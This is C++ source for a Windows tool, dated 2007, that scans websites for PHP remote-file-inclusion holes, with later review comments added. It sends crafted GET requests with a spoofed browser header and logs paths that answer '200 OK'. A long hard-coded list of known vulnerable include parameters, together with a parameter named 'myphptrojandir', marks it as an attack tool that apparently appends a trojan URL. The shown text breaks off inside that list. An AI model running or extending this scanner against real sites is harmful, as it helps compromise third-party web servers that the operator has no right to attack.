/*
PHP include vulnerability scanner, code by horse_b
2007-06-05
*/
#include "stdafx.h"
#include "getopt.h"
#include "windns.h"
#include <winsock.h>
// Per-probe parameter block; GetPhpInc receives a pointer to one of these
// through its LPVOID argument and only reads from it.
struct cgiurl{
char *rmt_host;     // passed to inet_addr() and sent as the Host: header value
char *rmt_wwwhost;  // sent as the Referer: header value
char *url;          // text appended directly after "GET " in the request
int n;              // copied into a local in GetPhpInc but not used there
int rmt_port;       // TCP port, converted with htons() before connect()
int vebose;         // (sic) copied into a local in GetPhpInc but not used there
};
// Incremented once at the start of every GetPhpInc call.
// NOTE(review): plain int with no synchronization; if GetPhpInc runs on
// several threads at once, updates can be lost - confirm with the caller.
int countvulscan = 0;
// Incremented by GetPhpInc each time a response contains "200 OK".
int findok = 0;
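/*
 * Appends one line to "log.s" (relative to the current working directory):
 * the bytes of `c` followed by CRLF.
 *
 * c  NUL-terminated text to record; a NULL pointer is ignored.
 *
 * The call is best-effort: when the file cannot be opened nothing is
 * written and no error is reported to the caller.
 * NOTE(review): there is no locking around the file, so lines written by
 * concurrent callers may interleave - confirm how this is called.
 */
void SaveLog(char* c)
{
    if (c == NULL)
        return;

    CString name = "log.s";
    CFile file;
    // modeCreate + modeNoTruncate opens an existing log without discarding
    // it and creates the file when it is missing, in a single call. The
    // original tried two Open() calls and ignored the result of the second,
    // so a failed create went on to seek and write on an unopened CFile.
    if (!file.Open(name, CFile::modeCreate | CFile::modeNoTruncate | CFile::modeReadWrite))
        return;

    file.SeekToEnd();
    UINT nLen = (UINT)strlen(c);
    file.Write(c, nLen);
    file.Write("\r\n", 2);
    file.Close();
}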
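/*
 * Sends one fixed-format HTTP GET for tcgi->url to
 * tcgi->rmt_host:tcgi->rmt_port, reads at most one chunk of the reply and,
 * when that chunk contains the text "200 OK", logs the path through
 * SaveLog(), prints it and increments findok.
 *
 * pParam  pointer to a struct cgiurl; it is only read here, never freed.
 * Returns 0 in every case.
 *
 * Notes for anyone reading this tool's output or its traffic:
 *  - The only success test is the substring "200 OK" in the first chunk of
 *    the response, so any resource that answers 200 is logged. A log entry
 *    is not evidence that the path is vulnerable.
 *  - The request line carries no HTTP version and the header block
 *    (User-Agent, If-Modified-Since, If-None-Match) is constant, which
 *    makes these requests straightforward to match in web-server logs.
 *  - inet_addr() accepts dotted-quad text only; a host name yields
 *    INADDR_NONE and the connect below fails.
 *  - NOTE(review): countvulscan and findok are plain ints updated without
 *    synchronization - confirm whether this runs on more than one thread.
 *
 * Fixes relative to the original body:
 *  - socket() failure is tested against INVALID_SOCKET (SOCKET is unsigned,
 *    so "sockfd < 0" could never be true) and returns instead of exit(0).
 *  - connect()/send() results are checked.
 *  - select() is called once; the original retried forever on error.
 *  - recv() leaves room for a terminating NUL before strstr() runs.
 *  - the socket is closed on every return path.
 *  - the log line is built with a bounded write and printed through "%s"
 *    rather than being used as the format string itself.
 */
UINT GetPhpInc(LPVOID pParam)
{
    struct cgiurl* tcgi = (struct cgiurl *)pParam;
    if (tcgi == NULL)
        return 0;

    char holetmp[4096] = "\0";   // zero-filled, so the final byte stays NUL
    char rbuff[1024];
    char *hole = tcgi->url;
    char *rmt_host = tcgi->rmt_host;
    char *rmt_wwwhost = tcgi->rmt_wwwhost;
    int port = tcgi->rmt_port;

    // Counted before any early return so the total still reflects every call.
    countvulscan++;

    if (rmt_host == NULL)
        return 0;

    CString url = "GET ";
    url += hole;
    url += "\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* \r\n";
    url += "Referer: ";
    url += rmt_wwwhost;
    url += "\r\n";
    url += "Accept-Language: zh-cn\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sun, 26 Jun 2005 15:43:05 GMT\r\nIf-None-Match: \"60794-12b3-e4169440\"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\n";
    url += "Host: ";
    url += rmt_host;
    url += "\r\n\r\n";

    SOCKET sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET)
        return 0;

    SOCKADDR_IN addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons((u_short)port);
    addr.sin_addr.s_addr = inet_addr(rmt_host);

    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR ||
        send(sockfd, (LPCTSTR)url, url.GetLength(), 0) == SOCKET_ERROR)
    {
        closesocket(sockfd);
        return 0;
    }

    memset(rbuff, 0, sizeof(rbuff));

    fd_set rd;
    FD_ZERO(&rd);
    FD_SET(sockfd, &rd);

    struct timeval tv;
    tv.tv_sec = 10;
    tv.tv_usec = 0;

    // Wait up to 10 seconds for readable data. An error or a timeout leaves
    // rbuff zeroed, so the "200 OK" test below simply does not match.
    int e = select(sockfd + 1, &rd, NULL, NULL, &tv);

    if (e > 0 && FD_ISSET(sockfd, &rd) != 0)
    {
        // One byte is held back so rbuff is always NUL-terminated.
        int n = recv(sockfd, rbuff, sizeof(rbuff) - 1, 0);
        if (n <= 0)
        {
            closesocket(sockfd);
            return 0;
        }
    }

    if (strstr(rbuff, "200 OK") != NULL)
    {
        CString display = "\tfind";
        display += hole;
        display += "------->>>>>> hole ok\r\n";

        // Bounded copy: the path length is caller-controlled and may exceed
        // holetmp; an over-long line is truncated instead of overflowing.
        _snprintf(holetmp, sizeof(holetmp) - 1, "%s\n", (LPCTSTR)display);
        SaveLog(holetmp);
        // The text contains the requested path, so it must never be the
        // format string itself.
        printf("%s", holetmp);
        findok++;
    }

    closesocket(sockfd);
    return 0;
}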
int StartScan(char *rmt_host,char *rmt_wwwhost,int rmt_host_port,char* myphptrojandir,int vebose)
{
char rbuff[1024];
char holetmp[4096] = "\0";
char* phpurl[430];
phpurl[0]="cgi-bin/gadgets/Blog/BlogModel.php?path=";
phpurl[1]="includes/header.php?systempath=";
phpurl[2]="Gallery/displayCategory.php?basepath=";
phpurl[3]="index.inc.php?PATH_Includes=";
phpurl[4]="nphp/nphpd.php?nphp_config[LangFile]=";
phpurl[5]="include/db.php?GLOBALS[rootdp]=";
phpurl[6]="ashnews.php?pathtoashnews=";
phpurl[7]="ashheadlines.php?pathtoashnews=";
phpurl[8]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
phpurl[9]="demo/includes/init.php?user_inc=";
phpurl[10]="jaf/index.php?show=";
phpurl[11]="inc/shows.inc.php?cutepath=";
phpurl[12]="poll/admin/common.inc.php?base_path=";
phpurl[13]="pollvote/pollvote.php?pollname=";
phpurl[14]="sources/post.php?fil_config=";
phpurl[15]="modules/My_eGallery/public/displayCategory.php?basepath=";
phpurl[16]="bb_lib/checkdb.inc.php?libpach=";
phpurl[17]="include/livre_include.php?no_connect=lol&chem_absolu=";
phpurl[18]="index.php?from_market=Y&pageurl=";
phpurl[19]="modules/mod_mainmenu.php?mosConfig_absolute_path=";
phpurl[20]="pivot/modules/module_db.php?pivot_path=";
phpurl[21]="modules/4nAlbum/public/displayCategory.php?basepath=";
phpurl[22]="derniers_commentaires.php?rep=";
phpurl[23]="modules/coppermine/themes/default/theme.php?THEME_DIR=";
phpurl[24]="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
phpurl[25]="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
phpurl[26]="coppermine/themes/maze/theme.php?THEME_DIR=";
phpurl[28]="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
phpurl[29]="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
phpurl[30]="myPHPCalendar/admin.php?cal_dir=";
phpurl[31]="agendax/addevent.inc.php?agendax_path=";
phpurl[32]="modules/mod_mainmenu.php?mosConfig_absolute_path=";
phpurl[33]="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
phpurl[34]="main.php?page=";
phpurl[35]="default.php?page=";
phpurl[36]="index.php?action=";
phpurl[37]="index1.php?p=";
phpurl[38]="index2.php?x=";
phpurl[39]="index2.php?content=";
phpurl[40]="index.php?conteudo=";
phpurl[41]="index.php?cat=";
phpurl[42]="include/new-visitor.inc.php?lvc_include_dir=";
phpurl[43]="modules/agendax/addevent.inc.php?agendax_path=";
phpurl[44]="shoutbox/expanded.php?conf=";
phpurl[45]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
phpurl[46]="pivot/modules/module_db.php?pivot_path=";
phpurl[47]="library/editor/editor.php?root=";
phpurl[48]="library/lib.php?root=";
phpurl[49]="e107/e107_handlers/secure_img_render.php?p=";
phpurl[50]="zentrack/index.php?configFile=";
phpurl[51]="main.php?x=";
phpurl[52]="becommunity/community/index.php?pageurl=";
phpurl[53]="GradeMap/index.php?page=";
phpurl[54]="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
phpurl[55]="calendar/calendar.php?serverPath=";
phpurl[56]="calendar/functions/popup.php?serverPath=";
phpurl[57]="calendar/events/header.inc.php?serverPath=";
phpurl[58]="calendar/events/datePicker.php?serverPath=";
phpurl[59]="calendar/setup/setupSQL.php?serverPath=";
phpurl[60]="calendar/setup/header.inc.php?serverPath=";
phpurl[61]="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
phpurl[62]="zentrack/index.php?configFile=";
phpurl[63]="pivot/modules/module_db.php?pivot_path=";
phpurl[64]="inc/header.php/step_one.php?server_inc=";
phpurl[65]="install/index.php?lng=../../include/main.inc&G_PATH=";
phpurl[66]="inc/pipe.php?HCL_path=";
phpurl[67]="include/write.php?dir=";
phpurl[68]="include/new-visitor.inc.php?lvc_include_dir=";
phpurl[69]="includes/header.php?systempath=";
phpurl[70]="support/mailling/maillist/inc/initdb.php?absolute_path=";
phpurl[71]="coppercop/theme.php?THEME_DIR=";
phpurl[72]="zentrack/index.php?configFile=";
phpurl[73]="pivot/modules/module_db.php?pivot_path=";
phpurl[74]="inc/header.php/step_one.php?server_inc=";
phpurl[75]="install/index.php?lng=../../include/main.inc&G_PATH=";
phpurl[76]="inc/pipe.php?HCL_path=";
phpurl[77]="include/write.php?dir=";
phpurl[78]="include/new-visitor.inc.php?lvc_include_dir=";
phpurl[79]="includes/header.php?systempath=";
phpurl[80]="support/mailling/maillist/inc/initdb.php?absolute_path=";
phpurl[81]="coppercop/theme.php?THEME_DIR=";
phpurl[82]="becommunity/community/index.php?pageurl=";
phpurl[83]="shoutbox/expanded.php?conf=";
phpurl[84]="agendax/addevent.inc.php?agendax_path=";
phpurl[85]="myPHPCalendar/admin.php?cal_dir=";
phpurl[86]="yabbse/Sources/Packages.php?sourcedir=";
phpurl[87